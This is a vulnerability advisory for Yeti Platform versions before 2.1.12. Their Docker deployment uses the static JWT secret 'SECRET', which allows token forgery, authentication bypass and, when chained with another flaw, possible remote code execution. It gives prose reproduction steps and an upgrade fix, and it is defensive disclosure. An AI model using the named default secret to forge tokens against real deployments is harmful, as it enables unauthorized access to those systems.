Yeti Platform Use of Static Insecure Secret Vulnerability Allowing JWT Authentication Bypass

A vulnerability exists in Yeti Platform versions prior to 2.1.12, where the application uses a static JWT secret 'SECRET' in its Docker deployment. If this secret is not changed, attackers can generate valid JWT tokens, bypassing authentication. The issue arises because the .env file, which contains the secret, is not properly documented or required to be modified during installation, leading to default configurations being used in the wild.

Impact

Exploitation of this vulnerability allows for unauthorized generation of JWT tokens, enabling authentication bypass. When combined with another vulnerability in Yeti that allows authenticated users to execute code on the server, this could lead to unauthenticated remote code execution.

Reproduction

To reproduce this vulnerability, deploy Yeti Platform using the default Docker-compose file without modifying the .env file. After deployment, the static JWT secret 'SECRET' will be used for authentication. With this known secret, valid JWT tokens can be generated, bypassing authentication.

Remediation

Users are advised to update to Yeti Platform version 2.1.12, where this vulnerability has been patched.